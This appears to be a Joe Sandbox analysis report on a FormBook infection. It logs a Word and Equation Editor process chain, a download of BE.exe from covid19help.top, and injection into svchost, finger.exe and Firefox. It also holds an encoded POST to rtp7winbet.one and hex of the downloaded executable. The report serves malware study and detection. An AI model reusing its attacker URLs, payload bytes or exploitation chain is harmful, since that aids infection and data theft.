May 3, 2024 11:35:54.469894886 CEST	739	OUT	POST /nrup/ HTTP/1.1 Host: www.rtp7winbet.one Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.rtp7winbet.one Connection: close Content-Length: 202 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.rtp7winbet.one/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 70 78 44 46 61 43 54 6d 51 4d 4e 70 2f 6e 6a 30 4f 7a 6a 4b 33 79 5a 52 4d 63 71 53 70 43 56 4e 4f 67 7a 74 35 4e 50 34 6e 77 50 46 50 4c 38 6b 68 6a 54 53 5a 69 62 62 42 73 6d 33 4c 51 46 32 63 48 4d 69 32 39 5a 6e 47 32 6a 49 72 45 52 64 50 36 62 56 76 51 30 72 71 4d 79 4c 4c 76 46 74 75 6e 4b 66 6d 71 73 68 62 4c 39 64 34 41 2b 54 6f 44 37 42 74 4a 6f 36 51 73 77 56 61 32 4b 38 7a 48 72 63 34 7a 44 39 66 32 50 59 6e 64 41 75 62 49 72 58 67 6a 77 77 74 6b 4a 72 49 41 73 43 59 32 35 70 58 4c 41 53 6d 51 59 79 64 52 2f 56 64 62 70 36 6b 54 75 64 33 75 51 55 72 4c 65 2b 4d 67 3d 3d Data Ascii: pX6dR=pxDFaCTmQMNp/nj0OzjK3yZRMcqSpCVNOgzt5NP4nwPFPL8khjTSZibbBsm3LQF2cHMi29ZnG2jIrERdP6bVvQ0rqMyLLvFtunKfmqshbL9d4A+ToD7BtJo6QswVa2K8zHrc4zD9f2PYndAubIrXgjwwtkJrIAsCY25pXLASmQYydR/Vdbp6kTud3uQUrLe+Mg==
May 3, 2024 11:35:54.567426920 CEST	837	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 03 May 2024 09:35:54 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Fri, 03 May 2024 10:35:54 GMT Location: https://rtp7winbet.one Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n%2FH3vDaFv9MMQ9qYN%2BDBK1xouA9xasb9eKP4kXDKldFq4q%2FK6yX2xU9K0EQ%2BdP62Dvb5PjAH4BRLKzlxB3jdvdZ5lwe4E3wBB5XrMTpRnca9257HLlXy09tiZFJpvjMYewT4jN4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 87df437dba1bc402-EWR alt-svc: h2=":443"; ma=60 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49163	172.67.175.222	443	1408	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
2024-05-03 09:32:01 UTC	308	OUT	GET /BE.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: covid19help.top Connection: Keep-Alive
2024-05-03 09:32:01 UTC	845	IN	HTTP/1.1 200 OK Date: Fri, 03 May 2024 09:32:01 GMT Content-Type: application/octet-stream Content-Length: 1228800 Connection: close Last-Modified: Thu, 02 May 2024 19:43:42 GMT ETag: "6633ecee-12c000" Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 CF-Cache-Status: HIT Age: 35887 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N5UN9floMlkFpjmN%2BJ1aU9l5bK094Gh7xW3yNdUlJplvqf1LFIsmdplkPyTjDBi6hyyKinikz7eMSDZGLk6%2FYAhfz3vWeYQj99ZbPdqnu3Uy9lcvBt%2FXzdUQ1xq7dcc5DsY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0; includeSubDomains; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 87df3dceae081815-EWR alt-svc: h3=":443"; ma=86400
2024-05-03 09:32:01 UTC	524	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z
2024-05-03 09:32:01 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 44 54 05 00 00 40 0d 00 00 56 05 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 a0 12 00 00 76 00 00 00 4a 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: .text `.rdata@@.datalpH@.rsrcDT@V@@.relocuvJ@B
2024-05-03 09:32:01 UTC	1369	IN	Data Raw: a3 5c 18 4d 00 ff 15 68 c2 49 00 8b f0 85 f6 0f 85 0b 11 04 00 33 d2 89 15 7c 18 4d 00 e8 c2 06 00 00 52 ff 15 68 c8 49 00 b8 30 14 4d 00 5e c9 c2 04 00 a1 30 14 4d 00 b9 40 14 4d 00 56 8b 40 04 c7 80 30 14 4d 00 68 c9 49 00 33 c0 a3 34 14 4d 00 a3 38 14 4d 00 a3 3c 14 4d 00 e8 2b 00 00 00 b9 74 14 4d 00 e8 21 00 00 00 be a8 14 4d 00 8b ce e8 85 95 00 00 68 20 c9 49 00 8b ce e8 6f 57 00 00 b8 30 14 4d 00 5e c2 04 00 56 8b f1 8d 4e 04 e8 65 95 00 00 8d 4e 14 e8 5d 95 00 00 8d 4e 24 e8 55 95 00 00 8b c6 5e c3 55 8b ec 51 53 56 57 8b f9 8d 9f 94 fb ff ff 8b 03 8b 40 04 c7 84 38 94 fb ff ff 5c c9 49 00 8b 03 8b 50 04 8d 82 94 fb ff ff 89 84 3a 90 fb ff ff 8b 87 7c fc ff ff 85 c0 0f 85 69 10 04 00 33 f6 56 56 56 68 48 c9 49 00 ff 15 d0 c7 49 00 39 b7 64 fd ff Data Ascii: \MhI3\|MRhI0M^0M@MV@0MhI34M8M<M+tM!Mh IoW0M^VNeN]N$U^UQSVW@8\IP:\|i3VVVhHII9d
2024-05-03 09:32:01 UTC	1369	IN	Data Raw: 9c e8 cb 7f 00 00 8d 4f 8c e8 c3 7f 00 00 8b 8f 7c ff ff ff 85 c9 75 06 83 67 84 00 5f c3 56 e9 cb 0d 04 00 56 57 8b f1 e8 11 00 00 00 8b b6 40 04 00 00 85 f6 0f 85 c9 0d 04 00 5f 5e c3 56 8b 71 04 85 f6 0f 85 dc 0d 04 00 5e c3 57 8b f9 83 7f 08 00 75 26 8b 3f 85 ff 75 02 5f c3 56 8b 77 24 8b cf e8 69 7f 00 00 6a 28 57 e8 9f e4 01 00 8b fe 59 59 85 f6 75 e6 5e 5f c3 ff 77 08 e8 d3 e4 01 00 59 eb cf 56 8b f1 8b 0e 85 c9 74 06 51 e8 98 fe ff ff 8d 8e ec 00 00 00 e8 0c 50 00 00 8d 8e bc 00 00 00 e8 26 7f 00 00 8d 8e ac 00 00 00 e8 1b 7f 00 00 8d 8e 9c 00 00 00 e8 10 7f 00 00 8d 8e 8c 00 00 00 e8 05 7f 00 00 8d 4e 08 5e e9 00 00 00 00 56 57 8b f9 33 f6 8b 44 f7 04 85 c0 0f 85 4e 0d 04 00 46 83 fe 10 7c ee 5f 5e c3 53 56 8b f1 33 db 57 38 5e 09 0f 85 54 0d 04 Data Ascii: O\|ug_VVW@_^Vq^Wu&?u_Vw$ij(WYYu^_wYVtQP&N^VW3DNF\|_^SV3W8^T
2024-05-03 09:32:01 UTC	1369	IN	Data Raw: 8b 75 0c 8b 5d f4 89 7d c8 74 31 8d 46 01 89 02 8d 8b 64 01 00 00 8d 45 c0 50 e8 64 0a 00 00 8d 4d e0 e8 62 b1 00 00 8d 4d d0 e8 5a b1 00 00 5f 5e 5b c9 c2 08 00 49 eb 89 41 eb 86 8d 47 01 89 02 eb dc e8 5b 01 00 00 84 c0 74 0e 8b ca e8 50 01 00 00 84 c0 74 03 b0 01 c3 32 c0 c3 55 8b ec 51 51 56 8b f1 80 be 6d 01 00 00 00 8b 86 68 01 00 00 75 53 ff 70 04 e8 1e 09 00 00 8d 4d ff c7 45 f8 01 00 00 00 51 8d 4d f8 51 50 8b ce e8 c5 00 00 00 85 c0 78 24 80 7d ff 00 8d 8e 64 01 00 00 74 1d 80 be 6d 01 00 00 00 8b 8e 68 01 00 00 75 1a 8b 49 04 8b 45 08 41 89 08 5e c9 c2 04 00 e8 6a 09 00 00 eb f4 8b 40 30 eb a8 8b 49 30 eb e1 e8 cd 00 00 00 84 c0 75 0c 8b ca e8 c2 00 00 00 84 c0 75 01 c3 b0 01 c3 55 8b ec 51 51 56 57 8b 7d 08 8d 45 ff 50 8d 45 f8 c7 45 f8 01 00 Data Ascii: u]}t1FdEPdMbMZ_^[IAG[tPt2UQQVmhuSpMEQMQPx$}dtmhuIEA^j@0I0uuUQQVW}EPEE
2024-05-03 09:32:01 UTC	1369	IN	Data Raw: 08 0f 84 27 01 00 00 8b 55 90 8b 4c 91 04 8b 55 f8 66 39 59 08 8b 5d fc 0f 85 37 ff ff ff 83 39 12 0f 8c 5e 06 04 00 83 39 13 0f 8e fa 02 00 00 83 39 18 0f 8e 4c 06 04 00 83 39 1e 0f 8e 13 ff ff ff 83 39 21 0f 8e 3a 06 04 00 83 39 23 0f 8e fb fe ff ff e9 2c 06 04 00 83 f8 20 0f 8f ff 00 00 00 0f 84 1e 01 00 00 83 e8 14 0f 84 72 05 04 00 83 e8 01 0f 84 14 05 04 00 83 e8 01 0f 84 b2 04 04 00 83 e8 01 0f 84 8b 04 04 00 8b 55 f8 8b 5d fc 83 e8 01 0f 85 ba fe ff ff e9 1e 04 04 00 8b 5d fc 8d 45 ec 43 89 7d ec 50 8d 8d 6c ff ff ff 89 5d fc 47 e8 ed 03 00 00 8b 85 70 ff ff ff 89 45 c0 8b 55 f8 e9 8a fe ff ff 8b 41 04 6a 7f 59 66 39 48 08 0f 85 bc 05 04 00 8b 45 fc 48 4f 83 bd 6c ff ff ff 00 89 45 fc 0f 84 83 03 04 00 80 bd 75 ff ff ff 00 8b 45 c0 0f 85 7b 03 04 Data Ascii: 'ULUf9Y]79^99L99!:9#, rU]]EC}Pl]GpEUAjYf9HEHOlEuE{
2024-05-03 09:32:01 UTC	1369	IN	Data Raw: ff 07 5f 5d c2 04 00 55 8b ec 56 8b 75 08 57 8b f9 8b 06 89 07 8d 4f 10 8b 46 04 89 47 04 8b 46 08 89 47 08 8b 46 0c 89 47 0c 8d 46 10 83 61 08 00 50 e8 e0 d7 00 00 8d 46 20 8d 4f 20 83 61 08 00 50 e8 d0 d7 00 00 8b c7 5f 5e 5d c2 04 00 33 d2 33 c0 40 89 51 10 89 41 1c 89 51 18 89 41 2c 8b c1 89 51 20 89 51 28 c3 55 8b ec 8b 45 08 85 c0 0f 8f 88 01 04 00 83 7d 0c 00 0f 85 a9 01 04 00 83 7d 10 00 75 34 83 7d 14 00 0f 85 b8 01 04 00 83 7d 18 00 0f 85 b7 01 04 00 83 7d 1c 00 0f 85 b6 01 04 00 83 7d 20 00 75 19 83 7d 24 00 0f 85 7e 01 04 00 33 c0 5d c2 20 00 6a ff 6a 77 e9 73 01 04 00 6a ff 6a 73 e9 6a 01 04 00 55 8b ec 83 ec 0c 56 8b f1 8b 46 0c 83 f8 06 7d 03 5e c9 c3 57 33 c9 6a 04 5a f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 4c d4 01 00 8b 3e 33 d2 59 8b 4e 0c 89 Data Ascii: _]UVuWOFGFGFGFaPF O aP_^]33@QAQA,Q Q(UE}}u4}}}} u}$~3] jjwsjjsjUVF}^W3jZQL>3YN
2024-05-03 09:32:01 UTC	1369	IN	Data Raw: e8 71 07 00 00 59 50 56 8b cf e8 77 16 00 00 5f 5e c9 c2 10 00 55 8b ec 83 ec 74 53 56 33 db 8d 4d 94 57 89 5d 90 e8 14 7b 00 00 ff 75 08 8d 4d 90 c7 45 a4 34 cc 49 00 89 5d a8 89 5d ac 89 5d b0 88 5d b4 e8 78 1c 00 00 8b 4d 0c be 18 14 4d 00 8a 45 b4 88 01 8b ce e8 db 0b 00 00 68 9c ca 49 00 8d 4d e0 e8 27 6e 00 00 6a 01 ff 35 18 14 4d 00 8d 4d b8 89 5d c4 89 5d c8 88 5d cc e8 26 20 00 00 85 c0 0f 84 03 fe 03 00 88 5d 0b 8d 4d e0 e8 d7 69 00 00 56 b9 f0 13 4d 00 e8 04 7a 00 00 8d 45 94 50 8d 4d c0 e8 b9 40 00 00 68 84 ca 49 00 8d 4d e0 e8 d7 6d 00 00 53 6a 01 8d 45 c0 50 8d 45 e0 50 e8 2f 79 00 00 8d 4d e0 e8 9b 69 00 00 68 74 ca 49 00 8d 4d d0 c7 45 e0 00 01 00 00 89 5d e8 c7 45 ec 01 00 00 00 e8 a1 6d 00 00 53 53 8d 45 e0 50 8d 45 d0 50 e8 fa 78 00 00 Data Ascii: qYPVw_^UtSV3MW]{uME4I]]]]xMMEhIM'nj5MM]]]& ]MiVMzEPM@hIMmSjEPEP/yMihtIME]EmSSEPEPx
2024-05-03 09:32:01 UTC	1369	IN	Data Raw: 68 c3 49 00 8b 45 fc 85 c0 74 05 33 c9 66 89 08 8d 8d fc ff fe ff e8 11 00 00 00 8d 85 fc ff fe ff 8b ce 50 e8 b3 37 00 00 5e c9 c3 56 8b f1 56 e8 b3 15 02 00 59 85 c0 74 0f 66 83 7c 46 fe 5c 75 07 33 c9 66 89 4c 46 fe 5e c3 55 8b ec 56 57 8b f9 33 f6 46 8b 4f 0c 8b 01 3b c6 0f 8f de fc 03 00 51 ff 75 08 8b cf e8 06 00 00 00 5f 5e 5d c2 04 00 55 8b ec 53 56 57 ff 75 08 8b f1 e8 65 15 02 00 59 8b 4e 0c 33 db 8b f8 43 8b 01 3b c3 0f 8f 0c fd 03 00 8b 46 04 8b ce 03 c7 50 e8 69 71 00 00 8b 1e 8d 04 3f 50 8b 46 04 ff 75 08 8d 04 43 50 e8 ed d9 01 00 01 7e 04 83 c4 0c 8b 06 33 d2 8b 4e 04 5f 66 89 14 48 8b c6 5e 5b 5d c2 08 00 55 8b ec 83 e4 f8 b8 3c 00 01 00 e8 f3 ea 03 00 8b 45 08 8d 4c 24 1c 53 33 db a3 94 23 4d 00 56 b8 34 cc 49 00 66 89 1d 90 23 4d 00 57 Data Ascii: hIEt3fP7^VVYtf\|F\u3fLF^UVW3FO;Qu_^]USVWueYN3C;FPiq?PFuCP~3N_fH^[]U<EL$S3#MV4If#MW
2024-05-03 09:32:01 UTC	1369	IN	Data Raw: 03 00 00 00 c7 44 24 20 01 04 00 00 85 c0 0f 85 71 fa 03 00 8b 86 98 01 00 00 89 44 24 24 89 07 80 3d 68 13 4d 00 01 8d 44 24 10 50 0f 84 80 fa 03 00 6a 00 ff 15 d0 c4 49 00 c6 05 68 13 4d 00 01 8b ce e8 07 00 00 00 5f 5e 5b 8b e5 5d c3 55 8b ec 83 e4 f8 81 ec cc 04 00 00 80 3d 68 13 4d 00 00 56 8b f1 0f 84 d4 00 00 00 68 04 01 00 00 8d 4c 24 0c e8 23 29 00 00 80 3d 67 13 4d 00 01 0f 84 39 fa 03 00 33 c0 66 89 44 24 18 8d 44 24 18 50 8d 4c 24 0c e8 e8 31 00 00 80 3d 65 13 4d 00 00 0f 85 4d fa 03 00 83 7e 60 00 0f 85 27 fa 03 00 68 f0 13 4d 00 8d 4c 24 0c e8 bc 29 00 00 be a8 03 00 00 8d 84 24 28 01 00 00 56 6a 00 50 e8 97 e9 01 00 a1 8c 13 4d 00 8d 4c 24 24 8b 54 24 14 83 c4 0c 89 b4 24 18 01 00 00 33 f6 46 89 84 24 1c 01 00 00 89 b4 24 20 01 00 00 68 80 Data Ascii: D$ qD$$=hMD$PjIhM_^[]U=hMVhL$#)=gM93fD$D$PL$1=eMM~`'hML$)$(VjPML$$T$$3F$$ h

Target ID:	0
Start time:	11:31:56
Start date:	03/05/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13fba0000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	11:31:57
Start date:	03/05/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:32:01
Start date:	03/05/2024
Path:	C:\Users\user\AppData\Roaming\fredchungel99962.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\fredchungel99962.exe"
Imagebase:	0x12b0000
File size:	1'228'800 bytes
MD5 hash:	3E42573B12F2ADBEFD9E6540BB9C56FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:32:02
Start date:	03/05/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\fredchungel99962.exe"
Imagebase:	0x570000
File size:	20'992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.382596136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.382596136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.382533799.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.382533799.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.383628126.0000000001F70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.383628126.0000000001F70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:32:09
Start date:	03/05/2024
Path:	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe"
Imagebase:	0x9f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.841406060.0000000003C70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.841406060.0000000003C70000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	11:32:12
Start date:	03/05/2024
Path:	C:\Windows\SysWOW64\finger.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\finger.exe"
Imagebase:	0x4d0000
File size:	10'240 bytes
MD5 hash:	EEC4E983BADE61121F4FB56F347D9B6B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.841357530.0000000000280000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.841357530.0000000000280000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.841245837.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.841245837.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.841337285.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.841337285.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	11:32:21
Start date:	03/05/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	11:32:25
Start date:	03/05/2024
Path:	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe"
Imagebase:	0x9f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.841509438.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.841509438.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	11:32:45
Start date:	03/05/2024
Path:	C:\Program Files (x86)\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
Imagebase:	0xf20000
File size:	517'064 bytes
MD5 hash:	C2D924CE9EA2EE3E7B7E6A7C476619CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.457614450.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.457614450.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	1.5%
Signature Coverage:	3.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	66

Executed Functions

Function 012B42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 012B430D

Part of subcall function 012B6B57: _wcslen.LIBCMT ref: 012B6B6A

GetCurrentProcess.KERNEL32(?,0134CB64,00000000,?,?), ref: 012B4422
IsWow64Process.KERNEL32(00000000,?,?), ref: 012B4429
LoadLibraryA.KERNEL32(kernel32.dll), ref: 012B4454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,?), ref: 012B4466
GetNativeSystemInfo.KERNEL32(?,?,?), ref: 012B4474
FreeLibrary.KERNEL32(00000000,?,?), ref: 012B447B
GetSystemInfo.KERNEL32(?,?,?), ref: 012B44A0

Strings

GetNativeSystemInfo, xrefs: 012B4460
kernel32.dll, xrefs: 012B444F
|O, xrefs: 012F36F8

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: d63f9c718f6935fb7d429fbcbddebfd7d1bfdb80d80598786ed01931924b81cc
Instruction ID: a86b3b502d863a232c17bd394cb2f7743913aabfba7c9e80abfa9db16fb59acb
Opcode Fuzzy Hash: d63f9c718f6935fb7d429fbcbddebfd7d1bfdb80d80598786ed01931924b81cc
Instruction Fuzzy Hash: 18A19565A2A3C1CFC736D76D70C11DD7FACBB26744F0858ADD28293A0AD2E4454ACB21

Uniqueness

Uniqueness Score: -1.00%

